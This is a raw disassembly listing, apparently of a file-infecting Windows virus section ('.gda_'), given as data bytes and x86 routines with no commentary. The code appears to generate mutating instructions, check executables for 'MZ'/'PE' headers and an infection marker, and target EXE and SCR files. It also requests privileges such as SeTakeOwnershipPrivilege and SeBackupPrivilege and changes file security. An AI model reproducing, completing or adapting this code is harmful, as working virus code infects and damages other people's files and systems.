dd 0AB0474C0h, 0EBF875B8h, 7FE8AB67h, 0F7FFFFFDh, 1039B085h
dd 800h, 80727500h, 1039AEBDh, 69740000h, 0FFFD65E8h, 1829B8FFh
dd 0A50AC929h, 1039AAh, 0A03E4C0h, 1039AAA5h, 4BE8AB00h
dd 0B0FFFFFDh, 858AAAB1h, 1039AEh, 0FD3CE8AAh, 0B60FFFFFh
dd 1039AA85h, 0C0048D00h, 0E0C14004h, 668DB008h, 0AA01B0ABh
dd 0FD20E857h, 3C29FFFFh, 0E2B86624h, 85F759FBh, 1039B0h
dd 10h, 49B00774h, 75B866AAh, 66E102FAh, 0FCFCE8ABh, 0E8B0FFFFh
dd 0ABC033AAh, 42B4BD89h, 85F70010h, 1039B0h, 20h, 0E8573B75h
dd 0FFFFFCDEh, 39B085F7h, 10h, 18748000h, 42E0BD89h, 39E80010h
dd 0E8FFFFFDh, 0FFFFFCC2h, 0E8AAC3B0h, 0FFFFFCBAh, 0B0CF8B5Ah
dd 0ACA2B58h, 1039A885h, 0FC4A8900h, 0FCA4E8AAh, 0B866FFFFh
dd 85F7C081h, 1039B0h, 40h, 0C4800374h, 0A8A50A28h, 66001039h
dd 0B8BD89ABh, 0AB001042h, 39B085F7h, 10h, 9754000h, 850250B0h
dd 1039A8h, 0B085F7AAh, 80001039h, 75000000h, 0AB8B00Bh
dd 1039A985h, 3DEBAA00h, 1831B866h, 39B085F7h, 1000010h
dd 2740000h, 0A50A29B0h, 1039A9h, 0A03E4C0h, 1039A9A5h
dd 66AB6600h, 0F7F081B8h, 1039B085h, 20000h, 0B4027500h
dd 0A9A50AC8h, 66001039h, 0D4BD89ABh, 0B8001042h, 29BCh
dd 0B085F7ABh, 8001039h, 74000000h, 0FBFCE871h, 85F7FFFFh
dd 1039B0h, 400h, 0B8B00B75h, 39AA850Ah, 0EBAA0010h, 0B085F74Dh
dd 1039h, 75000008h, 83B86611h, 0AAA50AE0h, 66001039h
dd 0AAC033ABh, 0B86615EBh, 0A50A1829h, 1039AAh, 0A03E4C0h
dd 1039AAA5h, 0F7AB6600h, 1039B085h, 100000h, 81B86600h
dd 800374C0h, 0A50A08C4h, 1039AAh, 0B60FAB66h, 1039AE85h
dd 8BE8AB00h, 0F7FFFFFBh, 1039B085h, 0
dd 0B00E7440h, 0A8850250h, 0AA001039h, 0FFFB71E8h, 0FE4F8DFFh
dd 42BC8D89h, 85F70010h, 1039B0h, 80000000h, 0E8B01774h
dd 0E0858BAAh, 2B001042h, 4E883C7h, 0E0BD89ABh, 0EB001042h
dd 0FBB2E805h, 3BE8FFFFh, 0F7FFFFFBh, 1039B085h, 1000000h
dd 0B00B7500h, 0A8850A40h, 0AA001039h, 0B8660FEBh, 0A50AC083h
dd 1039A8h, 1B0AB66h, 0B085F7AAh, 1039h, 75000200h, 0B085F72Fh
dd 1039h, 75000400h, 0AC0B01Ah, 1039AA85h, 0AFA58A00h
dd 0C1001039h, 0B86610E0h, 0B0AB8166h, 0B008EB00h, 0AA850A40h
dd 0AA001039h, 39B085F7h, 10h, 10750008h, 0E883B866h, 39A9A50Ah
dd 0AB660010h, 8EB01B0h, 850A48B0h, 1039A9h, 0FAB0E8AAh
dd 85F7FFFFh, 1039B0h, 100000h, 257575B1h, 0F883B866h
dd 39A9A50Ah, 0AB660010h, 29AAC033h, 1042BCBDh, 0B085F700h
dd 1039h, 75002000h, 0EB77B11Fh, 9B8661Bh, 0A9A50A18h
dd 0C0001039h, 0A50A03E4h, 1039A9h, 0BD29AB66h, 1042BCh
dd 0A58AC18Ah, 1042BCh, 58B0AB66h, 39A88502h, 0E8AA0010h
dd 0FFFFFA4Ah, 39B085F7h, 30010h, 2C740200h, 39B085F7h
dd 10h, 20750800h, 39B085F7h, 10h, 0A750600h, 0FFF9AFE8h
dd 0FA1CE8FFh, 0D1E8FFFFh, 0E8FFFFF9h, 0FFFFFA12h, 39B085F7h
dd 10h, 8741000h, 0E8AAC9B0h, 0FFFFF9FEh, 39B085F7h, 10h
dd 2A740040h, 852A07B0h, 1039A8h, 0D1AE0C1h, 240889h, 39A8A502h
dd 0E4C00010h, 4C48003h, 0F9D0E8ABh, 61B0FFFFh, 0F9C8E8AAh
dd 0B866FFFFh, 0A50AE0FFh, 1039A8h, 0B7E8AB66h, 0F7FFFFF9h
dd 1039B085h, 2000h, 0F76F7400h, 1039B085h, 0
dd 8B1F7480h, 0E08D8BC7h, 2B001042h, 0FC4189C1h, 0FFF9FFE8h
dd 0F988E8FFh, 0C3B0FFFFh, 0F980E8AAh, 0C78BFFFFh, 42B48D8Bh
dd 0C12B0010h, 0B0FC4189h, 0A8850A58h, 0AA001039h, 0FFF965E8h
dd 0B085F7FFh, 1039h, 74008000h, 50B8660Ch, 0A8850AC3h
dd 0EB001039h, 0FFB8660Ah, 0A8A50AE0h, 66001039h, 0F93CE8ABh
dd 85F7FFFFh, 1039B0h, 2000003h, 0CF8B5F74h, 42CC858Bh
dd 0C82B0010h, 33FC4889h, 0B085F7C9h, 1039h, 75010000h
dd 0A8858D0Eh, 8A001039h, 0F9804008h, 8DF87303h, 2444CD04h
dd 0E0C10010h, 0AB8BB008h, 0B86606E3h, 0AB66C031h, 808FB866h
dd 0B868h, 66E10200h, 85AB58ABh, 660675C9h, 66C031B8h
dd 0AAC3B0ABh, 0FFF8D1E8h, 0BC858DFFh, 0F7001039h, 1039B085h
dd 0
; ---------------------------------------------------------------------------
and [ebp+6], dh
push edi
sub edi, eax
pop eax
jmp short loc_31433F32
; ---------------------------------------------------------------------------
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+1042D4h]
add [ebp+1042B4h], edx
add [ecx], edi
mov eax, [esp+4]
loc_31433F32: ; CODE XREF: .gda_:31433F17�j
mov [ebp+101069h], edi
mov edi, [ebp+1042B8h]
sub eax, [ebp+1042B4h]
test dword ptr [ebp+1039B0h], 40h
jz short loc_31433F52
neg eax
loc_31433F52: ; CODE XREF: .gda_:31433F4E�j
stosd
retn 4
; ---------------------------------------------------------------------------
dw 5756h
dd 42F0BD83h, 0F000010h, 1D984h, 0DE800h, 454B0000h, 4C454E52h
dd 442E3233h, 0FF004C4Ch, 103E9E95h, 4858900h, 53001043h
dd 33C588Bh, 2873FFD8h, 0E834438Bh, 0FFFFF4E5h, 42E4958Bh
dd 35B0010h, 85890C42h, 104308h, 89084203h, 10430C85h
dd 28738B00h, 80B3FFh, 0BEE80000h, 8BFFFFF4h, 1042E4BDh
dd 0B2E85600h, 8BFFFFF4h, 1042E495h, 84A8B00h, 2B0C4A03h
dd 5E983CEh, 160880Fh, 840F0000h, 15Ah, 42E8B503h, 0B5030010h
dd 1042A4h, 0FE83CACh, 0A285h, 4468D00h, 42A4852Bh, 6030010h
dd 0F46FE850h, 0BD83FFFFh, 1042E4h, 3B0B7500h, 830F0C47h
dd 11Bh, 95390CEBh, 1042E4h, 10D850Fh, 85030000h, 1042A4h
dd 0FF388166h, 0FC850F25h, 8B000000h, 432B0240h, 32E85034h
dd 39FFFFF4h, 1042E4BDh, 0E4850F00h, 3000000h, 1042E885h
dd 0A4850300h, 8B001042h, 0C472B00h, 0CD820Fh, 473B0000h
dd 0C4830F08h, 83000000h, 470302C0h, 0A4850314h, 52001042h
dd 4B5FF50h, 0FF001043h, 103E5E95h, 0C0855A00h, 0B7850Fh
dd 9CE90000h, 3C000000h, 94850FFFh, 80000000h, 850F153Eh
dd 8Bh, 2B01468Bh, 0E8503443h, 0FFFFF3C1h, 42E4BD39h, 77750010h
dd 42E88503h, 85030010h, 1042A4h, 43108589h, 8B0010h, 4308853Bh
dd 8720010h, 430C853Bh, 69720010h, 3Dh, 0E8377270h, 1Fh
dd 8BFC4E8Dh, 3022BC1h, 853B1042h, 104310h, 0C4830C75h
dd 8F31FF10h, 611C2444h, 8FC31BEBh, 1042C485h, 0B58B6000h
dd 1042A4h, 0FFF45FE8h, 0A961FFh, 75800000h, 0C472B0Eh
dd 473B0972h, 3C820F08h, 49FFFFFFh, 0FEB2850Fh, 3C8BFFFFh
dd 0B0A78124h, 0FF000029h, 0EBFFBFFFh, 244A8142h, 0E0000060h
dd 8BC0334Eh, 8587240Ch, 1042F0h, 42EC8589h, 0B98D0010h
dd 29B4h, 42A48503h, 0A5660010h, 0C62B4EA5h, 2B144203h
dd 46C60C42h, 81C7E8FBh, 54h, 5, 5FFC4689h, 0FF57C35Eh
dd 103EAA95h, 1FE8C100h, 11A850Fh, 54500000h, 0FF6A286Ah
dd 3F0A95FFh, 0C0850010h, 5880F5Fh, 0E8000001h, 0FFFFE458h
dd 11E8h, 74655300h, 656C6946h, 75636553h, 79746972h, 0B5FF0041h
dd 104278h, 3E5E95FFh, 85890010h, 104280h, 19E8h, 54655300h
dd 4F656B61h, 72656E77h, 70696873h, 76697250h, 67656C69h
dd 0E8570065h, 0FFFFE829h, 13E8h, 52655300h, 6F747365h
dd 72506572h, 6C697669h, 656765h, 0E80BE857h, 12E8FFFFh
dd 53000000h, 63614265h, 5070756Bh, 69766972h, 6567656Ch
dd 0EEE85700h, 0E8FFFFE7h, 18h, 68436553h, 65676E61h, 69746F4Eh
dd 72507966h, 6C697669h, 656765h, 0E7CBE857h, 5450FFFFh
dd 3DBC858Dh, 646A0010h, 57016A50h, 3F1695FFh, 3C890010h
dd 5295FF24h, 2A00103Eh, 74BD8DC0h, 50001041h, 0B5FF5050h
dd 103DBCh, 4000168h, 16A5400h, 8095FF57h, 54001042h, 0FF57046Ah
dd 10428095h, 14C48300h, 4278B5FFh, 95FF0010h, 103E8Eh
dd 0B58DC35Fh, 104174h, 9295FF56h, 8300103Eh, 840FFFF8h
dd 0BBh, 42848589h, 6A0010h, 0CE95FF56h, 8500103Eh, 0A4840FC0h
dd 2B000000h, 6A5050C0h, 16A5003h, 68h, 95FF56C0h, 103E6Eh
dd 0FFFF883h, 60784h, 88858900h, 8D001042h, 10428C8Dh
dd 94958D00h, 51001042h, 50006A52h, 3E9A95FFh, 0F8830010h
dd 0D5840FFFh, 6A000005h, 88B5FF00h, 0FF001042h, 103E9695h
dd 0FFF88300h, 5BE840Fh, 85890000h, 10429Ch, 0C303C933h
dd 6A515051h, 0B5FF5104h, 104288h, 3E7295FFh, 0C0850010h
dd 59A840Fh, 0C9330000h, 42A08589h, 51510010h, 1F6851h
dd 0FF50000Fh, 103EBA95h, 0FC08500h, 55384h, 0A4858900h
dd 0C3001042h, 7317B8h, 384B8B00h, 39B085F7h, 10h, 6752000h
dd 10698503h, 0D2330010h, 0F1F7C103h, 8589E1F7h, 1042B0h
dd 29BBB8h, 3C4B8B00h, 10698503h, 0D2330010h, 0F1F7C103h
dd 8589E1F7h, 1042A8h, 4BB70FC3h, 35E3F906h, 0F18538Dh
dd 31443B7h, 0C16B49D0h, 81D00328h, 69775F3Ah, 1D74F96Eh
dd 10C7A83h, 4B8BE072h, 14428B3Ch, 8D104203h, 0F7FF4844h
dd 3BC123D9h, 10429C85h, 548BC300h, 0C0331024h, 0B8828Fh
dd 8BC30000h, 8D0BEBCFh, 104174BDh, 0DF8BFC00h, 3CACC933h
dd 3C067261h, 2C02777Ah, 5C3CAA20h, 2E3CEC74h, 3CDD74h
dd 0C9E3E875h, 453D018Bh, 74004558h, 43533D0Bh, 850F0052h
dd 0FFFFFF33h, 573D038Bh, 0F434E49h, 0FFFF2684h, 43573DFFh
dd 840F4E55h, 0FFFFFF1Bh, 3343573Dh, 10840F32h, 3DFFFFFFh
dd 4F545350h, 0FF05840Fh, 0DB33FFFFh, 0FFFE2DE8h, 0E81075FFh
dd 0FFFFFCFAh, 0FFFE21E8h, 0EC840FFFh, 33FFFFFEh, 16E8D2h
dd 63E80000h, 0E8FFFFFFh, 0
; ---------------------------------------------------------------------------
pop ebp
sub ebp, 10343Fh
jmp loc_314348BA
; ---------------------------------------------------------------------------
dd 8B32FF64h, 1042A4B5h, 22896400h, 4D3E8166h, 0E3850F5Ah
dd 8B000003h, 0DE033C5Eh, 503B8166h, 0D3850F45h, 0F7000003h
dd 20001643h, 850F0000h, 3C6h, 25C43F6h, 3BC840Fh, 438B0000h
dd 0A0A03D08h, 840FA0A0h, 3AEh, 2020203Dh, 0A3840F20h
dd 8B000003h, 0C88Bh, 5116E300h, 0FFEF54E8h, 0E88D03FFh
dd 3001042h, 406183CEh, 44618300h, 0FE9BE800h, 820FFFFFh
dd 37Ah, 42ECA583h, 8B000010h, 4A8B0842h, 73C12B10h, 0EBC03304h
dd 89C80305h, 8589104Ah, 1042ACh, 0B80C4A03h, 10000h, 0E68AE851h
dd 9530FFFFh, 1039AEh, 0B53020B1h, 1039AFh, 0C9FE206Ah
dd 0E8147858h, 0FFFFE670h, 940FD285h, 31E2D3C2h, 1039B095h
dd 0F7E5EB00h, 1039B085h, 0
dd 0F7227402h, 1039B085h, 300h, 810C7500h, 1039B0A5h, 0FFFFFF00h
dd 810AEBF7h, 1039B08Dh, 0
dd 66810h, 68590000h, 6, 0E622E858h, 858AFFFFh, 1039A8h
dd 0A82A8486h, 88001039h, 1039A885h, 0F7E0E200h, 1039B085h
dd 800h, 80097500h, 1039AABDh, 0C5740100h, 39B085F7h, 10h
dd 1B741000h, 39A8BD80h, 74050010h, 0A9BD80B0h, 5001039h
dd 0BD80A774h, 1039AAh, 0F79E7405h, 1039B085h, 40000000h
dd 80097400h, 1039A8BDh, 89770200h, 42F0A583h, 0E8000010h
dd 0FFFFF272h, 0FFFD43E8h, 271E8FFh, 9D8B0000h, 1042A8h
dd 42AC9D03h, 5BE80010h, 0FFFFFFCh, 25184h, 0A4B58B00h
dd 8B001042h, 0DE033C5Eh, 0FFFD5CE8h, 3B820FFFh, 81000002h
dd 60244Ah, 0FE8BE000h, 7A035652h, 107A0314h, 39B085F7h
dd 10h, 14752000h, 42F4BD89h, 0B58D0010h, 1039BCh, 10698D8Bh
dd 0A4F30010h, 0A6FB957h, 0B58D0000h, 101000h, 0B1A5F3h
dd 0A4F302E3h, 39B085F7h, 10h, 840F2000h, 0AEh, 0E82873FFh
dd 0FFFFED9Dh, 42E4958Bh, 0D2850010h, 98840Fh, 0B58B0000h
dd 1042A4h, 81104A8Bh, 60244Ah, 4A2BE000h, 33027308h, 147203C9h
dd 10698D3Bh, 8D8B0010h, 101069h, 3C8B5672h, 69A58324h
dd 1010h, 69A783h, 8B000000h, 4A01087Ah, 87F70308h, 0B8858BF7h
dd 0F7001042h, 1039B085h, 4000h, 0F7027400h, 0C720318h
dd 0B5893029h, 1042F0h, 128738Bh, 0B085F730h, 40001039h
dd 74000000h, 5118F702h, 0FFFC2BE8h, 0CEB59FFh, 2B287303h
dd 56510C72h, 595FA4F3h, 39BCB58Dh, 0BD890010h, 1042F4h
dd 5E5FA4F3h, 8D92310Fh, 13787h, 0AE953A00h, 75001039h
dd 78D26906h, 66123456h, 0E8E75089h, 0FFFFD9F1h, 0C4A8B5Ah
dd 0F7104A03h, 1039B085h, 0
dd 5418D20h, 8D891375h, 1042F0h, 10698503h, 0A7830010h
dd 69h, 28432B00h, 548789h, 85F70000h, 103F6Ch, 1, 43C70774h
dd 0A0A0A008h, 0B085F7A0h, 1039h, 74004000h, 5BE85207h
dd 5AFFFFF7h, 42F08D8Bh, 5E30010h, 0EB284B89h, 0EC8D8B0Dh
dd 0E3001042h, 8B03EB02h, 85F7284Bh, 1039B0h, 3, 858B1474h
dd 1042F4h, 42DC8D03h, 85030010h, 1042D8h, 4A8B0801h, 0A8858B10h
dd 39001042h, 373084Ah, 1084A89h, 63831042h, 858B0058h
dd 1042B0h, 29BC68h, 8420100h, 50430159h, 39AE958Ah, 85F70010h
dd 1039B0h, 20000000h, 8D030674h, 101069h, 85F700B6h, 1039B0h
dd 20000h, 0C6FE1475h, 39B085F7h, 10h, 6750004h, 39AFB58Ah
dd 85F70010h, 1039B0h, 4000h, 78A0B75h, 2AAC202h, 0EBF7E2D6h
dd 32078A09h, 0D602AAC2h
db 0E2h, 0F7h
; ---------------------------------------------------------------------------
loc_314348BA: ; CODE XREF: .gda_:314344BB�j
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
cmp dword ptr [ebp+104288h], 0
jz near ptr dword_31433F58+437h
push dword ptr [ebp+1042A4h]
call dword ptr [ebp+103EDEh]
push dword ptr [ebp+1042A0h]
call dword ptr [ebp+103E52h]
lea ecx, [ebp+10428Ch]
lea edx, [ebp+104294h]
push ecx
push edx
push 0
push dword ptr [ebp+104288h]
call dword ptr [ebp+103ED2h]
push dword ptr [ebp+104288h]
call dword ptr [ebp+103E52h]
lea esi, [ebp+104174h]
push dword ptr [ebp+104284h]
push esi
call dword ptr [ebp+103ECEh]
and dword ptr [ebp+104288h], 0
retn
; ---------------------------------------------------------------------------
db 0E8h
align 10h
dd 81016A5Dh, 1038BBEDh, 0FF05800h, 157885C1h, 0C0850010h
dd 0FFC883C3h, 85C10FF0h, 101578h, 103DC3h, 1C75002Ah
dd 247C8166h, 75716C0Ch, 0C4E86013h, 75FFFFFFh, 0FAB5E805h
dd 0D2E8FFFFh, 61FFFFFFh, 782DFF2Eh, 0B8123456h, 25h, 0FFA5E860h
dd 3975FFFFh, 3024448Bh, 4174B58Dh, 508B0010h, 3A816608h
dd 25730206h, 6856h, 0C48B00FFh, 5052006Ah, 3F1E95FFh
dd 0C4830010h, 5C3E8108h, 755C3F3Fh, 4C68303h, 0FFFA62E8h
dd 0FF7FE8FFh, 0C361FFFFh, 74B8h, 0B8B1EB00h, 2Fh, 1DE8h
dd 20C200h, 30B8h, 10E800h, 24C20000h, 185B800h, 3E80000h
dd 0C2000000h, 548D002Ch, 2ECD0C24h, 7C00F883h, 0E86019h
dd 8B000000h, 5D302454h, 0ED811A8Bh, 103992h, 0FFE0B3E8h
dd 4C261FFh, 3070600h, 57050201h, 0AD414461h, 9415FF98h
dd 8B010011h, 0FFh, 118h dup(0)
dd 42005C00h, 73006100h, 4E006500h, 6D006100h, 64006500h
dd 62004F00h, 65006A00h, 74006300h, 5C007300h, 74005600h
dd 65005300h, 74006300h, 63000000h, 0DE77E779h, 7D77E737h
dd 0FD77F515h, 77E7A5h, 0
dd 72000000h, 3777E746h, 9777E7A8h, 0B877E777h, 8377E61Bh
dd 3777E7AAh, 0E777E7ACh, 4977EBB1h, 2477E73Ch, 1877E794h
dd 0AB77E806h, 0EF77E74Ch, 0E277E793h, 9377E73Ch, 8F77E79Fh
dd 3477E6AFh, 8677E6ADh, 5777E7C4h, 0EF77E7C6h, 0D877E681h
dd 7677E805h, 1577E74Dh, 0B777E7C8h, 9577E706h, 0E977EBA5h
dd 9677EBA6h, 1A77E703h, 0E677E701h, 4C77E61Bh, 9077E77Ch
dd 0A77E750h, 8C77E798h, 6377E79Dh, 377F7E4h, 0A377F7E6h
dd 0B377F7E6h, 0D377F7E6h, 77F7E6h, 73000000h, 0F377F7EAh
dd 6377F7EAh, 8377F7EBh, 4377F7EBh, 7377F7ECh, 377F7EDh
dd 3377F7F5h, 77F526h, 15h dup(0)
dd 320030h, 31434FF4h, 42005Ch, 730061h, 4E0065h, 6D0061h
dd 640065h, 62004Fh, 65006Ah, 740063h, 5C0073h, 740056h
dd 650053h, 740063h, 0D2h dup(0)
dd 2A1300h, 1324h dup(0)
db 0
_gda_ ends
; Section 5. (virtual address 0001B000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0001A200
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 3143B000h
align 2000h
_idata2 ends
end start